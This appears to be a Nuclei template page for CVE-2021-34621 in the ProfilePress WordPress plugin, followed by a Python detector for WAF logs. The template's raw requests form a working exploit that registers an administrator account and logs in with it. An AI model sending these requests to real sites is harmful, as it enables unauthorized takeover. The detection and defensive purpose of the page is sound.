WordPress ProfilePress 3.0.0-3.1.3 - Admin User Creation Weakness
ID: CVE-2021-34621
Severity: critical
Author: 0xsapra
Tags: cve2021,cve,wordpress,wp-plugin,packetstorm,intrusive,properfraction
Description
ProfilePress WordPress plugin is susceptible to a vulnerability in the user registration component in the ~/src/Classes/RegistrationAuth.php file that makes it possible for users to register on sites as an administrator.
YAML Source
id: CVE-2021-34621

info:
  name: WordPress ProfilePress 3.0.0-3.1.3 - Admin User Creation Weakness
  author: 0xsapra
  severity: critical
  description: ProfilePress WordPress plugin is susceptible to a vulnerability in the user registration component in the ~/src/Classes/RegistrationAuth.php file that makes it possible for users to register on sites as an administrator.
  impact: |
    An attacker can exploit this vulnerability to create unauthorized admin accounts and gain full control over the WordPress site.
  remediation: |
    Update to the latest version of ProfilePress to fix the admin user creation weakness.
  reference:
    - https://www.wordfence.com/blog/2021/06/easily-exploitable-critical-vulnerabilities-patched-in-profilepress-plugin
    - https://nvd.nist.gov/vuln/detail/CVE-2021-34621
    - https://www.wordfence.com/blog/2021/06/easily-exploitable-critical-vulnerabilities-patched-in-profilepress-plugin/
    - http://packetstormsecurity.com/files/163973/WordPress-ProfilePress-3.1.3-Privilege-Escalation.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-34621
    cwe-id: CWE-306,CWE-269
    epss-score: 0.7888
    epss-percentile: 0.97984
    cpe: cpe:2.3:a:properfraction:profilepress:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 3
    vendor: properfraction
    product: profilepress
    framework: wordpress
  tags: cve2021,cve,wordpress,wp-plugin,packetstorm,intrusive,properfraction

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/javascript, */*; q=0.01
        Content-Type: multipart/form-data; boundary=---------------------------138742543134772812001999326589
        Origin: {{BaseURL}}
        Referer: {{BaseURL}}

        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="reg_username"

        {{randstr}}
        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="reg_email"

        {{randstr}}@interact.sh
        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="reg_password"

        {{randstr}}@interact.sh
        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="reg_password_present"

        true
        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="reg_first_name"

        {{randstr}}@interact.sh
        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="reg_last_name"

        {{randstr}}@interact.sh
        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="_wp_http_referer"

        /wp/?page_id=18
        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="pp_current_url"

        {{BaseURL}}
        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="wp_capabilities[administrator]"

        1
        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="signup_form_id"

        1
        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="signup_referrer_page"


        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="action"

        pp_ajax_signup
        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="melange_id"


        -----------------------------138742543134772812001999326589--

      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/javascript, */*; q=0.01
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        Origin: {{BaseURL}}
        Referer: {{BaseURL}}

        log={{randstr}}@interact.sh&pwd={{randstr}}@interact.sh&wp-submit=Log+In

      - |
        GET /wp-admin/ HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Connection: close

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - Welcome to your WordPress Dashboard

      - type: status
        status:
          - 200
# digest: 4a0a00473045022029ab825bc0f618dcefdd44a6da9802bdf75cf3210768055cc7988ed055342672022100d4e32b40093e5bf06d3ddf614fec163ceeaaa78dbd231b25fb723c8eb839a34d:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template detects the vulnerability in a target web application. Run it with the Nuclei tool against the site URL; the template is tagged intrusive because it registers a user and logs in with it, so the created account should be removed after the check.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-34621.yaml"
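As an added example, not code from the template or from the ProfilePress project: a small Python inspector for the request pattern the template sends, intended for a defender who logs request bodies at a WAF or reverse proxy (that logging setup is assumed, not shown). It parses a multipart/form-data body to admin-ajax.php and flags a `pp_ajax_signup` submission that carries a `wp_capabilities[...]` field, which an unauthenticated registration form should never be able to set. The boundary, field values and both sample bodies are constructed for this example from the field names shown in the template above.

```python
import re

# A registration form field that tries to assign a WordPress role directly,
# e.g. wp_capabilities[administrator]. Role name captured in group "role".
ROLE_FIELD = re.compile(r"^wp_capabilities\[(?P<role>[^\]]+)\]$")

# The admin-ajax action used by the ProfilePress signup form (from the template).
SIGNUP_ACTION = "pp_ajax_signup"


def boundary_from_content_type(content_type: str) -> str:
    """Extract the boundary parameter from a multipart Content-Type header."""
    match = re.search(r'boundary=("?)([^";]+)\1', content_type)
    if not match:
        raise ValueError("not a multipart request: " + content_type)
    return match.group(2)


def parse_multipart_fields(body: str, boundary: str) -> dict:
    """Return {field name: value} for the text parts of a multipart/form-data body.

    Delimiters in the body are the header boundary prefixed with two dashes;
    the closing delimiter carries two more dashes and is skipped.
    """
    fields = {}
    for part in body.split("--" + boundary):
        part = part.strip("\r\n")
        if not part or part == "--":
            continue
        head, _, value = part.partition("\r\n\r\n")
        name = re.search(r'name="([^"]+)"', head)
        if name:
            fields[name.group(1)] = value.strip("\r\n")
    return fields


def requested_roles(fields: dict) -> list:
    """List every role a client tried to self-assign through wp_capabilities[...]."""
    roles = []
    for name in fields:
        match = ROLE_FIELD.match(name)
        if match:
            roles.append(match.group("role"))
    return roles


def inspect_signup_request(content_type: str, body: str) -> dict:
    """Classify one admin-ajax.php POST body.

    'suspicious' is True only when the request is a ProfilePress signup AND it
    carries a client-chosen role; a plain signup without role fields is benign.
    """
    fields = parse_multipart_fields(body, boundary_from_content_type(content_type))
    roles = requested_roles(fields)
    is_signup = fields.get("action") == SIGNUP_ACTION
    return {
        "action": fields.get("action"),
        "requested_roles": roles,
        "suspicious": is_signup and bool(roles),
    }


# --- constructed sample input (not captured traffic) -------------------------
SAMPLE_BOUNDARY = "----examplebound"  # constructed boundary string
SAMPLE_CONTENT_TYPE = "multipart/form-data; boundary=" + SAMPLE_BOUNDARY


def _part(name: str, value: str) -> str:
    return (f"--{SAMPLE_BOUNDARY}\r\nContent-Disposition: form-data; "
            f'name="{name}"\r\n\r\n{value}\r\n')


# A signup that also tries to set the administrator role (the vulnerable pattern).
SAMPLE_BODY = "".join([
    _part("reg_username", "alice"),
    _part("reg_email", "alice@example.invalid"),
    _part("wp_capabilities[administrator]", "1"),
    _part("signup_form_id", "1"),
    _part("action", SIGNUP_ACTION),
]) + f"--{SAMPLE_BOUNDARY}--\r\n"

# An ordinary signup with no role field, which should not be flagged.
BENIGN_BODY = "".join([
    _part("reg_username", "bob"),
    _part("reg_email", "bob@example.invalid"),
    _part("signup_form_id", "1"),
    _part("action", SIGNUP_ACTION),
]) + f"--{SAMPLE_BOUNDARY}--\r\n"


if __name__ == "__main__":
    for label, body in (("role-escalating signup", SAMPLE_BODY), ("benign signup", BENIGN_BODY)):
        print(label, "->", inspect_signup_request(SAMPLE_CONTENT_TYPE, body))
```

The split-on-delimiter parser is deliberately simple and does not handle nested multipart or file parts; for production use, feed the same `requested_roles` check the form fields your proxy or WAF already decodes. The useful signal is the combination: the signup action together with any `wp_capabilities[...]` key, regardless of the role name, since a patched site ignores that field and a vulnerable one honours it.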